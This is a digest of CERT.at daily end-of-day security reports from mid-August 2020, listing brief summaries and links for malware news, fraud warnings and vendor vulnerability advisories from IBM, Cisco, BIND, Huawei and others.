∗∗∗ Security Bulletin: Multiple Java vulnerabilities affect IBM Spectrum Protect Plus (CVE-2020-2805, CVE-2020-2803, CVE-2020-2830, CVE-2020-2781, CVE-2020-2800, CVE-2020-2757, CVE-2020-2756, CVE-2020-2755, CVE-2020-2754) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-java-vulnerabili…
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Donnerstag 20-08-2020 18:00 − Freitag 21-08-2020 18:00
Handler: Stephan Richter
Co-Handler: Thomas Pribitzer
=====================
= News =
=====================
∗∗∗ Malware can no longer disable Microsoft Defender via the Registry ∗∗∗
---------------------------------------------
Microsoft has removed the ability to disable Microsoft Defender and third-party security software via the Registry to prevent malware from tampering with protection settings.
---------------------------------------------
https://www.bleepingcomputer.com/news/microsoft/malware-can-no-longer-disab…
∗∗∗ Emotet Malware Over the Years: The History of an Active Cyber-Threat ∗∗∗
---------------------------------------------
Malware strains come and go while Internet users become more and more accustomed to online threats being dealt with swiftly by the competent authorities. But what happens when a Trojan constantly eludes everyone’s best efforts to stop it in its tracks?
---------------------------------------------
https://heimdalsecurity.com/blog/emotet-malware-history/
∗∗∗ From SSRF to Compromise: Case Study ∗∗∗
---------------------------------------------
SSRF is a neat bug because it jumps trust boundaries. You go from being the user of a web application to someone on the inside, someone who can reach out and touch things on behalf of the vulnerable server. Exploiting SSRF beyond a proof-of-concept callback is often tricky because the impact is largely dependent on the environment you’re making that internal request in.
---------------------------------------------
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/from-ssrf-t…
∗∗∗ MISP 2.4.130 released (Various fixes, performance improvements and new features) ∗∗∗
---------------------------------------------
A new version of MISP (2.4.130) has been released with performance improvements, multiple bugs fixed and new features.
---------------------------------------------
https://www.misp-project.org/2020/08/21/MISP.2.4.130.released.html
∗∗∗ Aggressive DDoS extortionists posing as Fancy Bear are active again ∗∗∗
---------------------------------------------
The Link11 Security Operation Center has now warned of renewed DDoS extortion in the name of Fancy Bear, accompanied by high-volume DDoS attacks. According to the IT security provider Link11, the attacked companies also include KRITIS (critical infrastructure) operators.
---------------------------------------------
https://www.zdnet.de/88382211/aggressive-ddos-erpresser-von-fancy-bear-sind…
=====================
= Vulnerabilities =
=====================
∗∗∗ BIND Security Advisories ∗∗∗
---------------------------------------------
CVE-2020-8620: A specially crafted large TCP payload can trigger an assertion failure in tcpdns.c
CVE-2020-8621: Attempting QNAME minimization after forwarding can lead to an assertion failure in resolver.c
CVE-2020-8622: A truncated TSIG response can lead to an assertion failure
CVE-2020-8623: A flaw in native PKCS#11 code can lead to a remotely triggerable assertion failure in pk11.c
CVE-2020-8624: update-policy rules of type "subdomain" are enforced incorrectly
---------------------------------------------
https://kb.isc.org/docs/cve-2020-8620
https://kb.isc.org/docs/cve-2020-8621
https://kb.isc.org/docs/cve-2020-8622
https://kb.isc.org/docs/cve-2020-8623
https://kb.isc.org/docs/cve-2020-8624
∗∗∗ Security updates: Another "forgotten" backdoor in Cisco products ∗∗∗
---------------------------------------------
Attackers could target, among others, Cisco vWAAS, Smart Software Manager and Video Surveillance 8000 Series.
---------------------------------------------
https://heise.de/-4875646
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (ghostscript), Fedora (curl and mod_http2), Mageia (ngircd), openSUSE (kernel), SUSE (libreoffice), and Ubuntu (curl).
---------------------------------------------
https://lwn.net/Articles/829280/
∗∗∗ CERT/CC Warns of Vulnerabilities in Diebold Nixdorf, NCR ATMs ∗∗∗
---------------------------------------------
The CERT Coordination Center (CERT/CC) at Carnegie Mellon University has published alerts on several vulnerabilities that impact Diebold Nixdorf ProCash and NCR SelfServ automated teller machines (ATMs).
---------------------------------------------
https://www.securityweek.com/certcc-warns-vulnerabilities-diebold-nixdorf-n…
∗∗∗ Security Bulletin: Vulnerability in WebSphere Application Server Liberty affects IBM Spectrum Control (CVE-2020-4329) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-webspher…
∗∗∗ Security Bulletin: Golang Vulnerabilities in IBM Cloud CLI 1.1.0 or earlier ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-golang-vulnerabilities-in…
∗∗∗ Security Bulletin: IBM MQ for HPE NonStop Server is affected by vulnerability CVE-2020-4465 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-mq-for-hpe-nonstop-se…
∗∗∗ Security Bulletin: Information disclosure vulnerability in WebSphere Application Server Liberty ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-information-disclosure-vu…
∗∗∗ Security Bulletin: Vulnerabilities in Node.js affect IBM Spectrum Control (CVE-2020-8172, CVE-2020-8174, CVE-2020-11080) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-node-j…
∗∗∗ Security Bulletin: IBM® Db2® is vulnerable to an information disclosure and denial of service (CVE-2020-4414) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-db2-is-vulnerable-to-…
∗∗∗ Security Bulletin: Vulnerabilities in IBM Java SDK affect IBM Spectrum Control (CVE-2020-2654, CVE-2020-2781, CVE-2020-2800) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-ibm-ja…
∗∗∗ Security Bulletin: IBM MQ for HPE NonStop Server is affected by vulnerability CVE-2020-4375 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-mq-for-hpe-nonstop-se…
∗∗∗ Security Bulletin: WebSphere Application Server is vulnerable to a remote code execution vulnerability (CVE-2020-4589) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-websphere-application-ser…
∗∗∗ August 20, 2020 TNS-2020-06 [R1] Nessus 8.11.1 Fixes One Vulnerability ∗∗∗
---------------------------------------------
http://www.tenable.com/security/tns-2020-06
=====================
= End-of-Day report =
=====================
Timeframe: Mittwoch 19-08-2020 18:00 − Donnerstag 20-08-2020 18:00
Handler: Thomas Pribitzer
Co-Handler: Stephan Richter
=====================
= News =
=====================
∗∗∗ Lucifer cryptomining DDoS malware now targets Linux systems ∗∗∗
---------------------------------------------
A hybrid DDoS botnet known for turning vulnerable Windows devices into Monero cryptomining bots is now also scanning for and infecting Linux systems.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/lucifer-cryptomining-ddos-ma…
∗∗∗ Transparent Tribe: Evolution analysis, part 1 ∗∗∗
---------------------------------------------
Transparent Tribe, also known as PROJECTM and MYTHIC LEOPARD, is a highly prolific group whose activities can be traced as far back as 2013. Proofpoint published a very good article about them in 2016, and since that day, we have kept an eye on the group. [...] The USBWorm component is real, and it has been detected on hundreds of systems. This is malware whose existence was already speculated about years ago, but as far as we know, it has never been publicly described.
---------------------------------------------
https://securelist.com/transparent-tribe-part-1/98127/
∗∗∗ Office 365 Mail Forwarding Rules (and other Mail Rules too), (Thu, Aug 20th) ∗∗∗
---------------------------------------------
If you haven't heard, SANS suffered a "Data Incident" this summer, the disclosure was released on August 11. Details can be found in several locations: [...]
So that being said, how can we look for these things if you have hundreds, thousands or tens-of-thousands of mailboxes to consider? In an Office 365 shop, and especially if I wrote the code, the answer is most likely going to be PowerShell!
---------------------------------------------
https://isc.sans.edu/diary/rss/26484
∗∗∗ IBM Db2 Shared Memory Vulnerability (CVE-2020-4414) ∗∗∗
---------------------------------------------
I’ve recently blogged about a shared memory vulnerability in Cisco WebEx Meetings Client on Windows where any user can read memory dedicated to trace data. It turns out that this is a common problem. IBM Db2 is affected by the exact same type of problem. Developers forgot to put explicit memory protections around the shared memory used by the Db2 trace facility. This allows any local user read and write access to that memory area.
---------------------------------------------
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/ibm-db2-sha…
∗∗∗ Criminals are trying to steal online banking credentials! ∗∗∗
---------------------------------------------
Have you also received an email from "BawagPSK" in the last few days? If so, be careful! Fraudulent messages are currently circulating again in which the criminals pretend that you have to install the new security app for your online banking to keep working. In reality, the only goal is to get hold of your credentials!
---------------------------------------------
https://www.watchlist-internet.at/news/kriminelle-versuchen-zugangsdaten-zu…
∗∗∗ Google fixes major Gmail bug seven hours after exploit details go public ∗∗∗
---------------------------------------------
Attackers could have sent spoofed emails mimicking any Gmail or G Suite customer.
---------------------------------------------
https://www.zdnet.com/article/google-fixes-major-gmail-bug-seven-hours-afte…
=====================
= Vulnerabilities =
=====================
∗∗∗ Cisco Security Advisories 2020-08-19 ∗∗∗
---------------------------------------------
Cisco has published 24 security advisories, of which 1 was rated Critical and 2 were rated High.
---------------------------------------------
https://tools.cisco.com/security/center/Search.x?publicationTypeIDs=1&first…
∗∗∗ Important security updates released for Windows 8.1/Server 2012 R2 ∗∗∗
---------------------------------------------
Microsoft patches Windows 8.1 and Windows Server 2012 R2 with an out-of-band update.
---------------------------------------------
https://heise.de/-4874571
∗∗∗ High-Severity Vulnerability Patched in Advanced Access Manager ∗∗∗
---------------------------------------------
On August 13, 2020, the Wordfence Threat Intelligence team finished investigating two vulnerabilities in Advanced Access Manager, a WordPress plugin with over 100,000 installations, including a high-severity Authorization Bypass vulnerability that could lead to privilege escalation and site takeover.
---------------------------------------------
https://www.wordfence.com/blog/2020/08/high-severity-vulnerability-patched-…
∗∗∗ Security updates for Thursday ∗∗∗
---------------------------------------------
Security updates have been issued by Fedora (ansible, libmetalink, roundcubemail, rubygem-kramdown, sqlite, and swtpm), Slackware (curl), SUSE (python and python3), and Ubuntu (qemu).
---------------------------------------------
https://lwn.net/Articles/829181/
∗∗∗ Security Advisory - Integer Overflow Vulnerability in Huawei Smartphone ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20200819-…
∗∗∗ Security Advisory - Out Of Bound Read Vulnerability in Huawei Smartphone ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20200819-…
∗∗∗ Security Advisory - Information Leak Vulnerability in Huawei Products ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20200819-…
∗∗∗ Security Bulletin: IBM Content Navigator is susceptible to a sensitive data exposure. ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-content-navigator-is-…
∗∗∗ Security Bulletin: Vulnerability in Bash affects IBM Spectrum Protect Plus (CVE-2019-9924) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-bash-aff…
∗∗∗ Security Bulletin: IBM® Db2® is vulnerable to a buffer overflow leading to privilege escalation (CVE-2020-4363) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-db2-is-vulnerable-to-…
∗∗∗ Security Bulletin: IBM Content Manager is affected by a potential information disclosure vulnerability ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-content-manager-is-af…
∗∗∗ Security Bulletin: IBM Content Navigator is vulnerable to an Elliptic Curve Key Disclosure. ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-content-navigator-is-…
∗∗∗ Security Bulletin: Autocomplete not disabled for password field in IBM Content Navigator. ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-autocomplete-not-disabled…
∗∗∗ Security Bulletin: IBM Content Navigator is vulnerable to improper input validation ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-content-navigator-is-…
∗∗∗ Security Bulletin: vulnerability in snakeyaml might affect IBM Business Automation Workflow and IBM Business Process Manager (BPM) – CVE-2017-18640 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-snakeyam…
=====================
= End-of-Day report =
=====================
Timeframe: Dienstag 18-08-2020 18:00 − Mittwoch 19-08-2020 18:00
Handler: Thomas Pribitzer
Co-Handler: Stephan Richter
=====================
= News =
=====================
∗∗∗ FritzFrog malware attacks Linux servers over SSH to mine Monero ∗∗∗
---------------------------------------------
A sophisticated botnet campaign named FritzFrog has been discovered breaching SSH servers around the world, since at least January 2020.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/fritzfrog-malware-attacks-li…
∗∗∗ Example of Word Document Delivering Qakbot, (Wed, Aug 19th) ∗∗∗
---------------------------------------------
Qakbot is back on stage at the moment! Many security companies already reported some peaks of activity around this malware. On my side, I also spotted several samples. The one that I'll cover today has been reported by one of our readers (thanks to him) and deserves a quick analysis of the obfuscation used by the attackers. It is not available on VT at this time (SHA256:507312fe58352d75db057aee454dafcdce2cdac59c0317255e30a43bfa5dffbc)
---------------------------------------------
https://isc.sans.edu/diary/rss/26482
∗∗∗ CDN-Filestore Credit Card Stealer for Magento ∗∗∗
---------------------------------------------
During a website remediation, we recently discovered a new version of a Magento credit card stealer which sends all compromised data to the malicious domain cdn-filestore[dot]com. My colleague Luke Leal originally wrote about this malware in a blog post earlier this year. Malware Evolution & Evasive Techniques: One primary difference between this new version and the one Luke wrote about in April is that it was not packed. This detail suggests that the attackers updated the malware in an [...]
---------------------------------------------
https://blog.sucuri.net/2020/08/cdn-filestore-credit-card-stealer-for-magen…
∗∗∗ Voice Phishers Targeting Corporate VPNs ∗∗∗
---------------------------------------------
The COVID-19 epidemic has brought a wave of email phishing attacks that try to trick work-at-home employees into giving away credentials needed to remotely access their employers' networks. But one increasingly brazen group of crooks is taking your standard phishing attack to the next level, marketing a voice phishing service that uses a combination of one-on-one phone calls and custom phishing sites to steal VPN credentials from employees.
---------------------------------------------
https://krebsonsecurity.com/2020/08/voice-phishers-targeting-corporate-vpns/
∗∗∗ Attack of the Insta-clones ∗∗∗
---------------------------------------------
Our author puts it to the test: with a cloned social media account and some psychological skill, his contacts can be exploited and defrauded. Caution is advised.
---------------------------------------------
https://www.welivesecurity.com/deutsch/2020/08/18/angriff-der-insta-klone/
∗∗∗ 10 WordPress Security Mistakes You Might Be Making ∗∗∗
---------------------------------------------
Yesterday, August 18, 2020, the Wordfence Live team covered 10 WordPress Security Mistakes You Might be Making. This companion blog post reviews the recommendations we provided to avoid these mistakes and better secure your WordPress environment.
---------------------------------------------
https://www.wordfence.com/blog/2020/08/10-wordpress-security-mistakes-you-m…
∗∗∗ Ongoing Campaign Uses HTML Smuggling for Malware Delivery ∗∗∗
---------------------------------------------
An ongoing cybercrime campaign is employing a technique known as HTML smuggling to deliver malware onto the victim’s machine, Menlo Security reports. Referred to as Duri, the campaign started in early July and continues to date, attempting to evade network security solutions, including proxies and sandboxes, to deliver malicious code.
---------------------------------------------
https://www.securityweek.com/ongoing-campaign-uses-html-smuggling-malware-d…
∗∗∗ Numerous reports about hilufon.de, applefy.de and coyshop.de ∗∗∗
---------------------------------------------
Various iPhone models are and were offered on the different websites of appl handels ug. These are used devices. However, numerous Internet users have turned to the Watchlist Internet complaining about missing or heavily delayed deliveries and other problems with the vendor. Review portals show a similar picture.
---------------------------------------------
https://www.watchlist-internet.at/news/zahlreiche-meldungen-zu-hilufonde-ap…
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Wednesday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (imagemagick and ruby-websocket-extensions), Fedora (libetpan, LibRaw, and php), Gentoo (nss), Mageia (apache, ark, clamav, claws-mail, dovecot, firefox, firejail, freerdp, golang, jasper, kernel, libssh, libx11, postgresql-jdbc, python-rstlib, radare2, roundcubemail, squid, targetcli, thunderbird, tomcat, and x11-server), Red Hat (rh-mysql80-mysql), SUSE (dovecot22, freerdp, libvirt, and postgresql12), and Ubuntu (curl and linux-hwe, linux-azure-5.3, [...]
---------------------------------------------
https://lwn.net/Articles/829102/
∗∗∗ Vulnerability in Thales Product Could Expose Millions of IoT Devices to Attacks ∗∗∗
---------------------------------------------
Security researchers at IBM have discovered a potentially serious vulnerability in a communications module made by Thales for IoT devices. Millions of devices could be impacted, but the vendor released a patch six months ago.
---------------------------------------------
https://www.securityweek.com/vulnerability-thales-product-could-expose-mill…
∗∗∗ Security Advisory - Denial of Service Vulnerability in SmartPhone Product ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20200819-…
∗∗∗ Security Bulletin: Vulnerability identified in docker for Red Hat Enterprise Linux ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-identified-…
∗∗∗ Security Bulletin: IBM Cloud Private is vulnerable to IBM WebSphere Application Server Liberty vulnerabilities (CVE-2020-4303, CVE-2020-4304) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cloud-private-is-vuln…
∗∗∗ Security Bulletin: A vulnerability has been identified in IBM Elastic Storage Server GUI where an authorised user can execute an unauthorized function (CVE-2020-4378) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-has-been-…
∗∗∗ Security Bulletin: A Security Vulnerability affects IBM Cloud Private – OpenSSL (CVE-2019-1551) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-security-vulnerability-…
∗∗∗ Security Bulletin: IBM Cloud Private is vulnerable to a Kubernetes vulnerability (CVE-2019-11254) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cloud-private-is-vuln…
∗∗∗ Security Bulletin: Vulnerability in GNU gettext affects IBM Spectrum Protect Plus (CVE-2018-18751) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-gnu-gett…
∗∗∗ Security Bulletin: IBM Elastic Storage Server GUI is affected by cross-site scripting (CVE-2020-4358) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-elastic-storage-serve…
∗∗∗ Security Bulletin: IBM Cloud Private is vulnerable to an IBM WebSphere Application Server Liberty vulnerability (CVE-2019-17573) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cloud-private-is-vuln…
∗∗∗ Security Bulletin: Publicly disclosed vulnerabilities from Kernel affect IBM Netezza Host Management ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-publicly-disclosed-vulner…
∗∗∗ Security Bulletin: Multiple Vulnerabilities in IBM Java Runtime affect IBM Cloud Private ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
=====================
= End-of-Day report =
=====================
Timeframe: Montag 17-08-2020 18:00 − Dienstag 18-08-2020 18:00
Handler: Robert Waldner
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Cryptojacking worm steals AWS credentials from Docker systems ∗∗∗
---------------------------------------------
According to researchers at Cado Security this is the first-ever worm that comes with AWS credential theft functionality on top of run-of-the-mill cryptomining modules. This botnet uses already infected servers to execute an open-source masscan IP port scanner instance that scans for exposed Docker APIs (and Kubernetes systems as later discovered), installing itself in new containers on any misconfigured servers it finds.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/cryptojacking-worm-steals-aw…
∗∗∗ Email: Dangerous mailto links can steal data ∗∗∗
---------------------------------------------
This feature for file attachments is not part of the standard specification for mailto links. It is an unofficial extension used by some mail clients. According to the publication, the feature is supported in KMail and Evolution, the default mail clients of the Linux desktop environments KDE and GNOME. IBM Notes also supports the feature. Thunderbird itself is not affected, but it can be vulnerable if mailto links are handled via the xdg-open tool.
---------------------------------------------
https://www.golem.de/news/e-mail-gefaehrliche-mailto-links-koennen-daten-st…
∗∗∗ Pre-announcement of five BIND security issues scheduled for disclosure 20 August 2020 ∗∗∗
---------------------------------------------
We therefore are writing to inform you that the August BIND maintenance releases that will be released on Thursday, 20 August, contain patches for five separate vulnerabilities. Further details about the vulnerabilities will be publicly disclosed at the time the releases are published on Thursday.
---------------------------------------------
https://lists.isc.org/pipermail/bind-announce/2020-August/001161.html
∗∗∗ Online investment fraud is flourishing ∗∗∗
---------------------------------------------
Consumers affected by investment fraud keep turning to the Watchlist Internet. The criminals' methods are almost always the same: fabricated advertisements, promises of high returns and personal support entice the victims into large investments. In the end, this sometimes leads to losses that threaten their livelihood.
---------------------------------------------
https://www.watchlist-internet.at/news/online-anlagen-und-investitionsbetru…
=====================
= Vulnerabilities =
=====================
∗∗∗ Rocket.Chat Cross-Site Scripting leading to Remote Code Execution CVE-2020-15926 ∗∗∗
---------------------------------------------
A malicious user can send a specially crafted message either to a channel or in a direct message to another user which will result in executing JavaScript in the victim's browser or inside the desktop client when the victim uses the 'Reply in Thread' functionality. In the case of desktop clients, the cross-site scripting (XSS) vulnerability leads to remote code execution (RCE).
---------------------------------------------
https://blog.redteam.pl/2020/08/rocket-chat-xss-rce-cve-2020-15926.html
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (sane-backends), Fedora (kernel, LibRaw, and wob), openSUSE (balsa, hylafax+, postgresql, postgresql96, postgresql10, postgresql12, and postgresql96, postgresql10 and postgresql12), Oracle (.NET Core 3.1), Red Hat (bash and bind), SUSE (dovecot23, firefox, fwupd, postgresql10, postgresql12, python-azure-agent, and zabbix), and Ubuntu (ark, gnome-shell, libonig, linux, linux-aws, linux-kvm, linux-lts-xenial, linux-raspi2, linux-snapdragon, linux-gke-5.0, linux-oem-osp1 and software-properties).
---------------------------------------------
https://lwn.net/Articles/829030/
∗∗∗ Vulnerability Allowing Full Server Takeover Found in Concrete5 CMS ∗∗∗
---------------------------------------------
The issue was identified in Concrete5 version 8.5.2, which essentially allowed an attacker to modify site configuration and upload a PHP file onto the server, thus gaining arbitrary command execution capabilities.
---------------------------------------------
https://www.securityweek.com/vulnerability-allowing-full-server-takeover-fo…
∗∗∗ Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliance Security Update ∗∗∗
---------------------------------------------
Multiple vulnerabilities have been discovered in Citrix ADC (formerly known as NetScaler ADC), Citrix Gateway (formerly known as NetScaler Gateway) and Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO. These vulnerabilities, if exploited, could result in a number of security issues.
---------------------------------------------
https://support.citrix.com/article/CTX276688
∗∗∗ Security Bulletin: Vulnerabilities in IBM Java SDK affect IBM WebSphere Cast Iron Solution & App Connect Professional ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-ibm-ja…
∗∗∗ Security Bulletin: A vulnerability in IBM Java Runtime affects IBM Installation Manager and IBM Packaging Utility ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ibm-ja…
∗∗∗ Security Bulletin: Publicly disclosed vulnerability from Kernel affects IBM Netezza Host Management ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-publicly-disclosed-vulner…
∗∗∗ Security Bulletin: IBM Elastic Storage Server is affected by a vulnerability where an unprivileged user could execute commands as root (CVE-2020-4273) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-elastic-storage-serve…
∗∗∗ Security Bulletin: IBM Elastic Storage Server GUI is affected by verbose error messages being displayed. ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-elastic-storage-serve…
∗∗∗ Security Bulletin: Vulnerabilities in Apache Tomcat affect IBM Platform Symphony ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-apache…
∗∗∗ Security Bulletin: Incorrect permissions on IBM Spectrum Protect Plus agent files (CVE-2020-4631) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-incorrect-permissions-on-…
∗∗∗ Security Bulletin: A vulnerability in an older version of a Batik plugin that is included in IBM Installation Manager and IBM Packaging Utility ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-an-old…
∗∗∗ Security Bulletin: A vulnerability has been identified in IBM Elastic Storage Server GUI where an unauthorised user can execute commands (CVE-2020-4348) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-has-been-…
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Freitag 14-08-2020 18:00 − Montag 17-08-2020 18:00
Handler: Dimitri Robl
Co-Handler: Robert Waldner
=====================
= News =
=====================
∗∗∗ Microsoft fixes actively exploited Windows bug reported 2 years ago ∗∗∗
---------------------------------------------
Microsoft fixed a Windows security vulnerability two years after it was reported. This article provides greater detail about the bug and how it works (CVE-2020-1464).
---------------------------------------------
https://www.bleepingcomputer.com/news/security/microsoft-fixes-actively-exp…
∗∗∗ Potential Apache Struts 2 RCE flaw fixed, PoCs released ∗∗∗
---------------------------------------------
Have you already updated your Apache Struts 2 to version 2.5.22, released in November 2019? You might want to, and quickly, as information about a potential RCE vulnerability (CVE-2019-0230) and PoC exploits for it have been published.
---------------------------------------------
https://www.helpnetsecurity.com/2020/08/17/cve-2019-0230/
∗∗∗ RevoLTE: Phone calls could be eavesdropped on despite encryption ∗∗∗
---------------------------------------------
Security researchers point out a fundamental deficiency; mobile operators have reportedly already fixed it
---------------------------------------------
https://www.derstandard.at/story/2000119401327/revolte-telefonanrufe-liesse…
∗∗∗ Goodbye EmoCrash - Vulnerability in Emotet fixed ∗∗∗
---------------------------------------------
A vulnerability in Emotet's code (dubbed "EmoCrash") had for some time been circulated within the security community as a preventive measure against Emotet infections. The vulnerability in Emotet's installation routine, previously unknown to the wider public, could provide effective protection against infection: a buffer overflow in the code of that routine was exploited to make Emotet crash.
---------------------------------------------
https://cert.at/de/aktuelles/2020/8/godbye-emocrash-schwachstelle-in-emotet…
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (squid3), Fedora (lilypond and python3), openSUSE (xen), SUSE (libreoffice, libvirt, webkit2gtk3, xen, and xerces-c), and Ubuntu (apache2).
---------------------------------------------
https://lwn.net/Articles/828811/
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (dovecot, htmlunit, jruby, libetpan, lucene-solr, net-snmp, and postgresql-9.6), Fedora (firefox, nss, qt, and thunderbird), Mageia (glib-networking, mumble, webkit2, and znc), openSUSE (balsa, chromium, firejail, hylafax+, libreoffice, libX11, perl-XML-Twig, thunderbird, wireshark, and xrdp), Red Hat (libvncserver), SUSE (libvirt and perl-PlRPC), and Ubuntu (dovecot and salt).
---------------------------------------------
https://lwn.net/Articles/828945/
∗∗∗ Security Bulletin: Financial Transaction Manager for ACH Services is affected by a potential information disclosure id 177835 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-financial-transaction-man…
∗∗∗ Security Bulletin: LDAP vulnerability affects IBM SAN Volume Controller, IBM Storwize, IBM Spectrum Virtualize and IBM FlashSystem products ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ldap-vulnerability-affect…
=====================
= End-of-Day report =
=====================
Timeframe: Donnerstag 13-08-2020 18:00 − Freitag 14-08-2020 18:00
Handler: Dimitri Robl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Definition of overkill - using 130 MB executable to hide 24 kB malware, (Fri, Aug 14th) ∗∗∗
---------------------------------------------
One of our readers, Lukas, shared an unusual malicious executable with us earlier this week - one that was 130 MB in size. Making executables extremely large is not an uncommon technique among malware authors[1], as it allows them to easily avoid detection by most AV solutions, since the size of files which AVs will check is usually fairly low (tens of megabytes at most).
---------------------------------------------
https://isc.sans.edu/diary/rss/26464
∗∗∗ XCSSET: Mac malware infects Xcode projects ∗∗∗
---------------------------------------------
The malware relies on 0-day exploits to steal user data. Manipulated Xcode projects are spreading via Github, a security firm warns.
---------------------------------------------
https://heise.de/-4870987
∗∗∗ Chrome extensions that lie about their permissions ∗∗∗
---------------------------------------------
Users have learned to review the list of permissions Chrome extensions require before installing them from the webstore. But what's the use if they lie to you?
---------------------------------------------
https://blog.malwarebytes.com/puppum/2020/08/chrome-extensions-that-lie-abo…
∗∗∗ Beware of tradesman emergency services with the phone number 06608643901! ∗∗∗
---------------------------------------------
When a water pipe bursts, there is a gas leak or a power outage, an expert is usually needed fast. There is often no time left to vet a plumbing or electrical emergency service. Dubious companies exploit this: they offer an emergency service online, do actually show up, but afterwards bill grossly inflated costs.
---------------------------------------------
https://www.watchlist-internet.at/news/vorsicht-vor-handwerks-notdiensten-m…
∗∗∗ Mekotio: These aren’t the security updates you’re looking for… ∗∗∗
---------------------------------------------
Another in our occasional series demystifying Latin American banking trojans.
---------------------------------------------
https://www.welivesecurity.com/2020/08/13/mekotio-these-arent-the-security-…
=====================
= Vulnerabilities =
=====================
∗∗∗ Security flaw: Microsoft's multi-factor authentication bypassed ∗∗∗
---------------------------------------------
Microsoft's online services are supposed to be protected by a FIDO stick and PIN - but two developers were able to bypass the PIN prompt.
---------------------------------------------
https://www.golem.de/news/sicherheitsluecke-microsofts-multi-faktor-authent…
∗∗∗ Critical Vulnerabilities Patched in Quiz and Survey Master Plugin ∗∗∗
---------------------------------------------
On July 17, 2020, our Threat Intelligence team discovered two vulnerabilities in Quiz and Survey Master (QSM), a WordPress plugin installed on over 30,000 sites. These flaws made it possible for unauthenticated attackers to upload arbitrary files and achieve remote code execution, as well as delete arbitrary files like a site’s wp-config.php file [...]
---------------------------------------------
https://www.wordfence.com/blog/2020/08/critical-vulnerabilities-patched-in-…
